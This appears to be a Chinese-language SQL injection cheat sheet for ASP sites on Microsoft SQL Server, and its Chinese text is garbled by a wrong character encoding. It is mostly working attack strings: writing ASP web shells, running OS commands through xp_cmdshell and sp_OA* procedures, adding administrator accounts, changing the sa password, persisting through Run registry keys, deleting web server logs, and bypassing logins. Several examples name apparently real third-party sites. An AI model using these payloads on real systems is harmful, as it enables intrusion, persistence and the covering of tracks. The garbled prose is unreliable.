1銆?  鐢╚杞箟瀛楃鏉ュ啓ASP(涓鍙ヨ瘽鏈ㄩ┈)鏂囦歡鐨勬柟娉?
?   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--

?   echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

2銆?  鏄劇ずSQL緋葷粺鐗堟湰錛?
?   http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--

Microsoft VBScript 緙栬瘧鍣ㄩ敊璇?閿欒 '800a03f6'
緙哄皯 'End'
/iisHelp/common/500-100.asp錛岃242
Microsoft OLE DB Provider for ODBC Drivers 閿欒 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp錛岃17
3銆?  鍦ㄦ嫻嬬儲(chǔ)灝間腑鍥界殑緗戠珯婕忔礊鏃訛紝鍒嗘槑宸茬粡紜畾浜?jiǎn)婕弸z炲瓨鍦ㄥ嵈鏃犳硶鍦ㄨ繖涓夌婕忔礊涓壘鍒板搴旂殑綾誨瀷銆傚伓鐒墮棿鎴戞兂鍒頒簡(jiǎn)鍦⊿QL璇█涓彲浠ヤ嬌鐢?#8220;in”鍏抽敭瀛楄繘琛屾煡璇紝渚嬪“select * from mytable where id in(1)”錛屾嫭鍙蜂腑鐨勫煎氨鏄垜浠彁浜ょ殑鏁版嵁錛屽畠鐨勭粨鏋滀笌浣跨敤“select * from mytable where id=1”鐨勬煡璇㈢粨鏋滃畬鍏ㄧ浉鍚屻傛墍浠ヨ闂〉闈㈢殑鏃跺欏湪URL鍚庨潰鍔犱笂“) and 1=1 and 1 in(1”鍚庡師鏉ョ殑SQL璇彞灝卞彉鎴愪簡(jiǎn)“select * from mytable where id in(1) and 1=1 and 1 in(1)”錛岃繖鏍峰氨浼?xì)鍑虹幇鏈熷緟宸蹭箙鐨剻宓闈簡(jiǎn)銆傛殏涓斿氨鍙繖縐嶇被鍨嬬殑婕忔礊涓?#8220;鍖呭惈鏁板瓧鍨?#8221;鍚э紝鑱槑鐨勪綘涓瀹氭兂鍒頒簡(jiǎn)榪樻湁“鍖呭惈瀛楃鍨?#8221;鍛€傚浜?jiǎn)锛屽畠灏辨槸鐢变簬绫讳?#8220;select * from mytable where name in(‘firstsee’)”鐨勬煡璇㈣鍙ラ犳垚鐨勩?br>
4銆?  鍒ゆ柇xp_cmdshell鎵╁睍瀛樺偍榪囩▼鏄惁瀛樺湪錛?br>http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
鎭㈠xp_cmdshell鎵╁睍瀛樺偍鐨勫懡浠わ細(xì)
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell',’e:\inetput\web\xplog70.dll’;--

5銆?  鍚戝惎鍔ㄧ粍涓啓鍏ュ懡浠よ鍜屾墽琛岀▼搴忥細(xì)
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'


6銆?  鏌ョ湅褰撳墠鐨勬暟鎹簱鍚嶇О錛?br>?   http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) n鏀規(guī)垚0,1,2,3……灝卞彲浠ヨ法搴撲簡(jiǎn)
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript 緙栬瘧鍣ㄩ敊璇?閿欒 '800a03f6'
緙哄皯 'End'
/iisHelp/common/500-100.asp錛岃242
Microsoft OLE DB Provider for ODBC Drivers 閿欒 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp錛岃17
7銆?  鍒楀嚭褰撳墠鎵鏈夌殑鏁版嵁搴撳悕縐幫細(xì)
select * from master.dbo.sysdatabases   鍒楀嚭鎵鏈夊垪鐨勮褰?br>select name from master.dbo.sysdatabases 浠呭垪鍑簄ame鍒楃殑璁板綍

8銆?  涓嶉渶xp_cmdshell鏀寔鍦ㄦ湁娉ㄥ叆婕忔礊鐨凷QL鏈嶅姟鍣ㄤ笂榪愯CMD鍛戒護(hù)錛?br>CREATE TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
-- Runs an OS command through the OLE Automation procedures and copies its output into the
-- mytmp table one row per line, so the result can be read back with a plain SELECT (the
-- section's stated purpose: running a command on a server where xp_cmdshell is unavailable).
-- Defensive notes: sp_OACreate / sp_OAMethod / sp_OAGetProperty are the "Ole Automation
-- Procedures"; EXECUTE on them is granted only to sysadmin by default, and on SQL Server 2005+
-- the feature stays disabled until enabled through sp_configure. An application login that can
-- reach them is over-privileged, and any sp_OA* call from an application account is a
-- high-signal event for auditing (SQL Trace / Extended Events on those procedure names).
DECLARE @shell INT          -- object token returned by sp_oacreate for WScript.Shell
DECLARE @fso INT            -- object token for Scripting.FileSystemObject
DECLARE @file INT           -- object token for the TextStream returned by OpenTextFile
DECLARE @isEnd BIT          -- AtEndOfStream property of the TextStream
DECLARE @out VARCHAR(400)   -- one line of command output
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
-- Note: the 'true' argument to run means "wait for the program to finish"; long-running
-- commands such as ping need it so that c:\temp.txt is complete before it is read below.
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
-- Because fso's OpenTextFile method returns a TextStream object, @file is an object token here.
-- @shell is never modified inside the loop, so "WHILE @shell>0" loops until the BREAK fires on
-- AtEndOfStream; the ELSE CONTINUE is redundant.
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)   -- table was created as "mytmp" above; presumes a case-insensitive collation
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

DROP TABLE MYTMP

----------
-- Same OLE Automation pattern as the script above, here launching adsutil.vbs to rewrite the IIS
-- W3SVC/InProcessIsapiApps metabase list (section 21 of this page presents that as elevating the
-- web user's privileges). It expects MYTMP to exist already and does not drop it afterwards.
-- Defensive notes: the sp_OA* procedures are sysadmin-only by default and, on SQL Server 2005+,
-- disabled until enabled through sp_configure; a cscript/adsutil.vbs process started under the
-- SQL Server service account and any change to InProcessIsapiApps are both worth alerting on.
DECLARE @shell INT          -- object token for WScript.Shell
DECLARE @fso INT            -- object token for Scripting.FileSystemObject
DECLARE @file INT           -- object token for the TextStream opened on c:\temp.txt
DECLARE @isEnd BIT          -- AtEndOfStream property of the TextStream
DECLARE @out VARCHAR(400)   -- one line of command output
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
-- @shell never changes inside the loop; the only exit is the BREAK on AtEndOfStream.
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

浠ヤ笅鏄竴琛岄噷闈㈠皢WEB鐢ㄦ埛鍔犲埌綆$悊鍛樼粍涓細(xì)
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

浠ヤ笅鏄竴琛屼腑鎵цEXE紼嬪簭錛?br>DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

SQL涓嬩笁縐嶆墽琛孋MD鍛戒護(hù)鐨勬柟娉曪細(xì)

鍏堝垹闄?.18鍙鋒棩蹇楋細(xì)
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

錛?錛夐鍏堝紑鍚痡et娌欑洏妯″紡錛岄氳繃鎵╁睍瀛樺偍榪囩▼xp_regwrite淇敼娉ㄥ唽琛ㄥ疄鐜幫紝綆$悊鍛樹(shù)慨鏀規(guī)敞鍐岃〃涓嶈兘棰勯槻鐨勫師鍥犮傚嚭浜庡畨鍏ㄥ師鍥狅紝榛樿娌欑洏妯″紡鏈紑鍚紝榪欏氨鏄負(fù)浠涔堥渶瑕亁p_regwrite鐨勫師鍥狅紝鑰寈p_regwrite鑷沖皯闇瑕丏B_OWNER鏉冮檺錛屼負(fù)浜?jiǎn)鏂逛究锛寴q欓噷寤鴻浣跨敤sysadmin鏉冮檺嫻嬭瘯錛?br>?   exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
娉細(xì)
0   紱佹涓鍒囷紙榛樿錛?br>1   浣胯兘璁塊棶ACCESS錛屼絾鏄姝㈠叾瀹?br>2   紱佹璁塊棶ACCESS錛屼絾鏄嬌鑳藉叾浠?br>3   浣胯兘涓鍒?br>
?   榪欓噷浠呯粰鍑簊ysadmin鏉冮檺涓嬩嬌鐢ㄧ殑鍛戒護(hù)錛?br>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')


?   寤虹珛閾炬帴鏁版嵁搴?L0op8ack'鍙傝冨懡浠わ細(xì)
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'

?   濡備綍浣跨敤閾炬帴鏁版嵁搴擄細(xì)

浣跨敤榪欎釜鏂瑰紡鍙互鎵ц錛屼絾鏄緢涓嶅垢錛孌B_OWNER鏉冮檺鏄笉澶熺殑錛岄渶瑕佽嚦灝憇ysadmin鏉冮檺鎴栬卻ecurityadmin+setupadmin鏉冮檺緇勫悎
sp_addlinkedserver闇瑕乻ysadmin鎴杝etupadmin鏉冮檺
sp_addlinkedsrvlogin闇瑕乻ysadmin鎴杝ecurityadmin鏉冮檺
鏈緇堝彂鐜幫紝榪樻槸sa鏉冮檺鎴栬卻etupadmin+securityadmin鏉冮檺甯愭埛鎵嶈兘浣跨敤錛?br>涓鑸病鏈夊摢涓鐞嗗憳榪欎箞璁劇疆鏅氬笎鎴鋒潈闄愮殑

瀹炵敤鎬т笉寮猴紝浠呬綔涓轟竴涓涔?fàn)鎬葷粨鍚?br>
澶ц嚧榪囩▼濡備笅錛屽鏋滀笉鏄痵ysadmin錛岄偅涔圛AS.mdb鏉冮檺楠岃瘉浼?xì)鍑洪敊锛?br>鎴戞祴璇曠殑鏃跺欐巿浜坔acker榪欎釜鐢ㄦ埛setupadmin+securityadmin鏉冮檺錛屼嬌鐢╥as.mdb澶辮觸
闇瑕佹壘涓涓竴鑸敤鎴峰彲璁塊棶鐨刴db鎵嶅彲浠ワ細(xì)

?   鏂板緩閾炬帴鏈嶅姟鍣?#8221;L0op8ack”:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
?   exec sp_addlinkedsrvlogin 'L0op8ack','false';--鎴?br>exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
?   SELECT * FROM OPENQUERY(L0op8ack, 'SELECT shell("cmd.exe /c net user")');--
?   exec sp_droplinkedsrvlogin 'L0op8ack','false';--
?   exec sp_dropserver 'L0op8ack';--

鍐嶈冭礉涓涓叾瀹冩枃浠舵潵浠f浛7.18鏃ユ枃浠訛細(xì)
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

9銆?  鐢║PDATE鏉ユ洿鏂拌〃涓殑鏁版嵁錛?br>HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
www鐢ㄦ埛瀵嗙爜鐨?6浣峂D5鍊間負(fù)錛歛0b923820dcc509a錛屽嵆鎶婂瘑鐮佹敼鎴?錛?br>32浣峂D5鍊間負(fù)錛?  錛屽瘑鐮佷負(fù)

10銆?  鍒╃敤琛ㄥ唴瀹瑰鎴愭枃浠跺姛鑳?br>SQL鏈塀CP鍛戒護(hù)錛屽畠鍙互鎶婅〃鐨勫唴瀹瑰鎴愭枃鏈枃浠跺茍鏀懼埌鎸囧畾浣嶇疆銆傚埄鐢ㄨ繖欏瑰姛鑳斤紝鎴戜滑鍙互鍏堝緩涓寮犱復(fù)鏃惰〃錛岀劧鍚庡湪琛ㄤ腑涓琛屼竴琛屽湴杈撳叆涓涓狝SP鏈ㄩ┈錛岀劧鍚庣敤BCP鍛戒護(hù)瀵煎嚭褰㈡垚ASP鏂囦歡銆?br>鍛戒護(hù)琛屾牸寮忓涓嬶細(xì)
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'鍙傛暟涓烘墽琛屾煡璇㈢殑鏈嶅姟鍣紝'U'鍙傛暟涓虹敤鎴峰悕錛?P'鍙傛暟涓哄瘑鐮侊紝鏈緇堜笂浼犱簡(jiǎn)涓涓猺uncommand.asp鐨勬湪椹?銆?br>
11銆佸垱寤鴻〃銆佹挱鍏ユ暟鎹拰璇誨彇鏁版嵁鐨勬柟娉?br>?   鍒涘緩琛細(xì)
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
?   寰琛ㄩ噷鎾叆鏁版嵁錛?br>' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
?   浠庤〃閲岃鍙栨暟鎹細(xì)
' and 1=(select count(*) from cyfd where gyfd >1)--

?   鍒犻櫎涓存椂琛細(xì)
';drop table cyfd;--

12銆侀氳繃SQL璇彞鐩存帴鏇存敼sa鐨勫瘑鐮侊細(xì)
?   update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,榪欐牱sa鐨勫瘑鐮佸氨琚垜浠敼鎴愪簡(jiǎn)111111鎷夈傚懙鍛碉紝瑙e喅鐨勬柟娉曞氨鏄妸sa緇欏垹鎷夈傦紝鎬庝箞鍒犲彲浠ュ弬鑰冩垜鐨勩婂畬鍏ㄥ垹闄a榪欎釜鍚庨棬銆嬨?br>
?   鏌ョ湅鏈満鎵鏈夌殑鏁版嵁搴撶敤鎴峰悕錛?br>select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins

?   鏇存敼sa鍙d護(hù)鏂規(guī)硶錛氱敤sql緇煎悎鍒╃敤宸ュ叿榪炴帴鍚庯紝鎵ц鍛戒護(hù)錛?br>exec sp_password NULL,'鏂板瘑鐮?,'sa'

13銆佹煡璇vbbs搴撲腑鎵鏈夌殑琛ㄥ悕鍜岃〃緇撴瀯錛?br>?   select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
?   select * from dvbbs.dbo.syscolumns where id=1426104121

14銆佹墜宸ュ浠藉綋鍓嶆暟鎹簱錛?br>瀹屽叏澶囦喚錛?br>;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--
宸紓澶囦喚錛?br>;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT鈥?br>
15銆佹坊鍔犲拰鍒犻櫎涓涓猄A鏉冮檺鐨勭敤鎴穞est錛?br>exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

cmd.exe /c isql -E /U alma /P /i K:\test.qry

16銆乻elect * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
灝卞彲浠ュ垪鍑哄簱ChouYFD涓墍鏈夌殑鐢ㄦ埛寤虹珛鐨勮〃鍚嶃?br>Select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0

17銆?br>?   http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns 錛坵here id=1234錛?br>鍒楀嚭rdweb搴撲腑鎵鏈夎〃涓殑瀛楁鍚嶇О
?   select * from dvbbs.dbo.syscolumns where id=5575058
鍒楀嚭搴揹vbbs涓〃id=5575058鐨勬墍鏈夊瓧孌靛悕

18銆佸垹闄よ褰曞懡浠わ細(xì)delete from Dv_topic where boardid=5 and topicid=7978

19銆佺粫榪囩櫥褰曢獙璇佽繘鍏ュ悗鍙扮殑鏂規(guī)硶鏁寸悊錛?br>1) ' or''='
2) ' or 1=1--
3) ‘ or ‘a’=’a--
4) ‘or’=’or’
5) " or 1=1--
6錛塷r 1=1--
7錛?or ’a=’a
8錛? or "a"="a
9錛?’) or (’a’=’a
10錛?") or ("a"="a
11錛?錛?or (1=1
12) 'or''='
13) 浜烘皵%’ and 1=1 and ’%’=’

20銆佸鎵劇綉绔欒礬寰勭殑鏂規(guī)硶姹囨伙細(xì)
1錛夋煡鐪媁EB緗戠珯瀹夎鐩綍鍛戒護(hù)錛?br>?   cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt 錛堝皢2鎹㈡垚1銆?銆?銆?璇曡瘯錛?br>type c:\test1.txt
del c:\test1.txt
鍦∟BSI涓嬪彲浠ョ洿鎺ユ樉紺鴻繍琛岀粨鏋滐紝鎵浠ヤ笉鐢ㄥ鍑哄埌鏂囦歡

2錛夊湪緗戠珯涓婇殢渚挎壘鍒頒竴涓浘鐗囩殑鍚嶅瓧 123.jpg
鐒跺悗鍐欒繘鎵瑰鐞嗙▼搴?23.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt

鎵ц鍚?type c:\123.txt
榪欐牱鏉ュ垎鏋愮綉绔欑殑璺緞

3錛塖QL鏈嶅姟鍣ㄥ拰緗戠珯鏈嶅姟鍣ㄥ湪鍚屼竴涓湇鍔″櫒涓婏紝濂戒簡(jiǎn)鏄彲浠ユ墽琛屽懡浠ゆ槸鍚э紵
灝嗘墽琛屽懡浠よ緭鍑虹粨鏋滃埌
%windir%\help\iishelp\common\404b.htm鎴栬?00.asp
娉ㄦ剰杈撳嚭鍓岯ackup榪欎袱涓枃浠?br>濡傦細(xì)
dir c:\ >%windir%\help\iishelp\common\404b.htm
鐒跺悗闅忎究杈撳叆涓涓枃浠舵潵璁塊棶錛歨ttp://鐩爣ip/2.asp

4錛夐拡瀵箇in2000緋葷粺錛歺p_regread璇誨彇HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots 鑾峰彇WEB璺緞
2003緋葷粺錛歺p_regread璇誨彇錛屾湭鎵懼埌鏂規(guī)硶
濡傦細(xì)
錛?錛?  鏂板緩涓涓〃cyfd(瀛楁涓篻yfd)錛?a target=_blank>http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
錛?錛?  鎶妛eb璺緞鍐欒繘鍘?http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
錛?錛?  榪樻槸璁╀粬涓嶅尮閰嶏紝鏄劇ず閿欒:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: 灝?varchar 鍊?'Y:\Web\鐑熷彴浜烘墠鐑嚎鍚庡彴綆$悊緋葷粺,,201 ' 杞崲涓烘暟鎹被鍨嬩負(fù) int 鐨勫垪鏃跺彂鐢熻娉曢敊璇?br>TargeSite: Boolean Read() 鍝堝搱鍝堛傘傝礬寰勬毚闇蹭簡(jiǎn)銆傘?br>錛?錛夋帴涓嬫潵鍒犻櫎琛?http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--

5錛夌敤regedit鍛戒護(hù)瀵煎嚭娉ㄥ唽琛紝灝嗗鍑虹殑緇撴灉淇濆瓨鐨勮礬寰勫埌%windir%\help\iishelp\common\404b.htm鎴栬?00.asp欏甸潰
regedit鍛戒護(hù)璇存槑錛?br>Regedit /L:system /R:user /E filename.reg Regpath
鍙傛暟鍚箟錛?br>/L錛歴ystem鎸囧畾System.dat鏂囦歡鎵鍦ㄧ殑璺緞銆?br>/R錛歶ser鎸囧畾User.dat鏂囦歡鎵鍦ㄧ殑璺緞銆?br>/E錛氭鍙傛暟鎸囧畾娉ㄥ唽琛ㄧ紪杈戝櫒瑕佽繘琛屽鍑烘敞鍐岃〃鎿嶄綔錛屽湪姝ゅ弬鏁板悗闈㈢┖涓鏍鹼紝杈撳叆瀵煎嚭娉ㄥ唽琛ㄧ殑鏂囦歡鍚嶃?br>Regpath錛氱敤鏉ユ寚瀹氳瀵煎嚭鍝釜娉ㄥ唽琛ㄧ殑鍒嗘敮錛屽鏋滀笉鎸囧畾錛屽垯灝嗗鍑哄叏閮ㄦ敞鍐岃〃鍒嗘敮銆傚湪榪欎簺鍙傛暟涓紝"/L錛歴ystem"鍜?/R錛歶ser"鍙傛暟鏄彲閫夐」錛屽鏋滀笉浣跨敤榪欎袱涓弬鏁幫紝娉ㄥ唽琛ㄧ紪杈戝櫒鍒欒涓烘槸瀵?a class=wordstyle target=_blank>WINDOWS鐩綍涓嬬殑"system.dat"鍜?user.dat"鏂囦歡榪涜鎿嶄綔銆傚鏋滄槸閫氳繃浠庤蔣鐩樺惎鍔ㄥ茍榪涘叆DOS錛岄偅涔堝氨蹇呴』浣跨敤"/L"鍜?/R"鍙傛暟鏉ユ寚瀹?system.dat"鍜?user.dat"鏂囦歡鐨勫叿浣撹礬寰勶紝鍚﹀垯娉ㄥ唽琛ㄧ紪杈戝櫒灝嗘棤娉曟壘鍒板畠浠傛瘮濡傝錛屽鏋滈氳繃鍚姩鐩樿繘鍏OS錛屽垯澶囦喚娉ㄥ唽琛ㄧ殑鍛戒護(hù)鏄?Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",璇ュ懡浠ょ殑鎰忔濇槸鎶婃暣涓敞鍐岃〃澶囦喚鍒?a class=wordstyle target=_blank>WINDOWS鐩綍涓嬶紝鍏舵枃浠跺悕涓?regedit.reg"銆傝屽鏋滆緭鍏ョ殑鏄?regedit /E D:\regedit.reg"榪欐潯鍛戒護(hù)錛屽垯鏄鎶婃暣涓敞鍐岃〃澶囦喚鍒癉鐩樼殑鏍圭洰褰曚笅錛堢渷鐣ヤ簡(jiǎn)"/L"鍜?/R"鍙傛暟錛夛紝鍏舵枃浠跺悕涓?Regedit.reg"銆?br>
regedit /s c:\adam.reg 錛堝鍏:\adam.reg鏂囦歡鑷蟲(chóng)敞鍐岃〃錛?br>regedit /e c:\web.reg 錛堝浠藉叏閮ㄦ敞鍐屽唴瀹瑰埌c:\web.reg涓級(jí)
閽堝win2000緋葷粺錛欳:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
鐒跺悗http://鐩爣IP/2.asp
閽堝win2003緋葷粺錛氭病鏈夋壘鍒幫紝甯屾湜鎵懼埌鐨勬湅鍙嬪叕甯冨嚭鏉ヤ竴璧瘋璁恒?br>
6錛夎櫄鎷熶富鏈轟笅%SystemRoot%\system32\inetsrv\MetaBack\涓嬬殑鏂囦歡鏄痠is鐨勫浠芥枃浠訛紝鏄厑璁竪eb鐢ㄦ埛璁塊棶鐨勶紝濡傛灉浣犵殑iis澶囦喚鍒拌繖閲岋紝鐢╳ebshell涓嬭澆涓嬫潵鍚庣敤璁頒簨鏈墦寮錛屽彲浠ヨ幏鍙栧搴旂殑鍩熷悕鍜寃eb緇濆璺緞銆?br>
7錛塖QL娉ㄥ叆寤虹珛铏氭嫙鐩綍錛屾湁dbo鏉冮檺涓嬫壘涓嶅埌web緇濆璺緞鐨勪竴縐嶈В鍐沖姙娉曪細(xì)
鎴戜滑寰堝鎯呭喌涓嬮兘閬囧埌SQL娉ㄥ叆鍙互鍒楃洰褰曞拰榪愯鍛戒護(hù)錛屼絾鏄嵈寰堜笉瀹規(guī)槗鎵懼埌web鎵鍦ㄧ洰褰曪紝涔熷氨涓嶅ソ寰楀埌涓涓獁ebshell錛岃繖涓鎷涗笉閿欙細(xì)
?   寤虹珛铏氭嫙鐩綍win,鎸囧悜c:\winnt\system32錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
